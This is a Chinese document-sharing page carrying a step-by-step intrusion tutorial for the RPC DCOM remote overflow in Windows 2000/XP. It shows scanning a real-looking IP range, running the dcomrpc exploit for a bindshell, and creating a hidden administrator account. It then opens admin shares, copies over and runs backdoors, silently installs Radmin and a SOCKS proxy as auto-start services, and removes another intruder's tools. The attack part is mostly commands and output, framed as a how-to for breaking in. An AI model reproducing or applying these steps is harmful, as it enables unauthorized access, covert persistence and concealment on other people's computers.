


下載本文檔
版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
1、利用dcomrpc遠程溢出漏洞入侵主機最近,網上非常流行dcomrpc,那今天我們就教你詳細的利用dcomrpc入侵。和入侵之后必須做什么。 需要的工具: 很好的: radmin.EE 掃描工具: retinarpcdcom.EE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟 telnet工具:telnet.vbe opentelnet.EE resumetelnet.EE 代理:sksockserver.EE 后門程序:WinEggDropShellPro3thVersion 好了,該做的都做的差不多了。 先使用retinarpcdcom.EE掃描一個網段。查找有rpc漏洞的機子,
2、這個漏洞需要135端口開放,(想必 隨便掃一下就會發現有許多主機開放的135端口) 211.217.50.xx 第一個主機就被掃出來又此漏洞。 看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下其他的缺陷主機開了3389端口我們可以上去看一下是xp版本還是win2k是win2k server版本展開命令行: 查看dcomrpc的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpc RPC DCOM Expl01t coded by .:oc192.us:. Security Complied and Modi
3、fied by Expl01t Usage: dcomrpc -d <host> options Options: -d: Hostname to attack Required -t: Type Default: 0 -r: Return address Default: Selected from target -p: Attack port Default: 135 -l: Bindshell port Default: 666 Types: 0 0x0018759f: Win2k-Universal 1 0x0100139d: WinXP-Universal 開始進行溢出:
4、 F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0 RPC DCOM remote expl01t - .:oc192.us:. Security Complied and recorrected by Expl01t + Resolving host. + Done. + Expl01ting.Just wait. 等到出現,說明溢出成功 c:/winnt/system32> 接著我們建立用戶 c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。 把用戶添加成超級管理員 c:/winnt/
5、system32>net localgroup administrators blueye$ /add 命令成功完成。 看看共享開了沒有沒有的話把共享開開 c:/winnt/system32>net share 清單是空的。 c:/winnt/system32>net share ipc$ 命令成功完成。 c:/winnt/system32>net share admin$ 命令成功完成。 到這里我們入侵告一段落 建 立 IPC$ 連 接 ,也可以使用tftp上傳 ,先和對方建立連接 F:/hack>net use /211.217.50.xx/ipc$ &quo
6、t;1111" /user:blueye$ 上 傳 一 個 后 門 程 序 到 對 方 的 主 機 里 F:/hack>copy d:/inject.EE /211.217.50.xx/admin$/system32 F:/hack>copy d:/tback.dll /211.217.50.xx/admin$/system32 然后運行后門程序,我們可以使用at命令。但是有的機器把at明令禁止了,建議直接開起telnet 使用opentelnet.EE 關閉開啟的telnet使用resumetelnet / /ip user password 如果忘記開共享可以使用腳本
7、開啟 telnet來開共享,用法: cscript telnet.vbe ip user password null port (null是驗證方式) F:/hack>opentenet /211.217.50.xx blueye$ 1111 1 4567 F:/hack>telnet 211.217.50.xx 4567 (省略) 連接并運行后門程序運行后門程序命令 根目錄:inject.EE -run (后門使用方法和安裝都在zip文件里面包含了) 后門端口123456 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDr
8、opShell Matrix Version Melody 下面安裝radmin,配置好的radmin客戶端有4個文件。配置radmin客戶端可參考相關文章。 radmin.reg raddrv.dll admdll.dll r_server.EE 把這個4個文件copy c:/winnt/system32 在目錄下面執行命令 c:/winnt/system32>r_server /s radmin.reg -導入注冊表 c:/winnt/system32>r_server /install /silence -安裝radmin.并且不顯示托盤 c:/winnt/system32&
9、gt;net start r_server - 啟動服務 安裝sock代理 把sksockserver.EE copy c:/winnt/system32 c:/winnt/system32>sksockserver /install -安裝服務 c:/winnt/system32>sksockserver -config port 1234 -端口定在1234 自己可以改 c:/winnt/system32>sksockserver -config starttype 2 -開機自動啟動 c:/winnt/system32>net start skserver -啟動
10、服務 最后刪除共享 net share ipc$ /del net share admin$ /del 在安裝radmin的時候你發現有人已經安裝了。 看操作 (我輸入的內容) 后門連接 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody #(pslist) Melody #(pskill r_server) Melody #(shell) c:/winnt/system32>(del r_server.EE) c:/winnt/system32>(del admdll.dll) c:/winnt/system32>(del raddrv.dll) copy你自己的上去,然后安裝 省事的辦法直接導入注冊表,然后重新輸入安裝命令運行,就可以了,只是在原來默認端口上
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 品牌傳播的法律與道德考量計劃
- 銀行事后風險評估試題及答案2025年總結
- 探索國際金融理財師考試的關鍵試題及答案
- 知識深化2025年特許金融分析師考試試題及答案
- 眾籌智慧的網絡編輯師證書考試試題及答案
- 小語種考試的課程設置與試題及答案
- 2025年銀行從業資格證考試的重要時間節點試題及答案
- 評估2025年國際金融理財師考試學習效果的標準試題及答案
- 2025年特許金融分析師考試多元視角試題及答案
- 2025年特許金融分析師考試專業技巧試題及答案
- 方太營銷案例分析
- 2023年一級建造師《管理與實務(通信與廣電工程)》考試真題
- 空調系統維保記錄表
- 《空間向量基本定理》示范課教學設計【高中數學人教】
- GB/T 25742.4-2022機器狀態監測與診斷數據處理、通信與表示第4部分:表示
- GB/T 6417.1-2005金屬熔化焊接頭缺欠分類及說明
- GB/T 14823.2-1993電氣安裝用導管特殊要求-剛性絕緣材料平導管
- 北醫安全法規考試題
- 2023年宜昌市中醫醫院醫護人員招聘筆試題庫及答案解析
- 加強施工管理、嚴格保護環境
- 抗拔樁裂縫計算表格(自動版)
評論
0/150
提交評論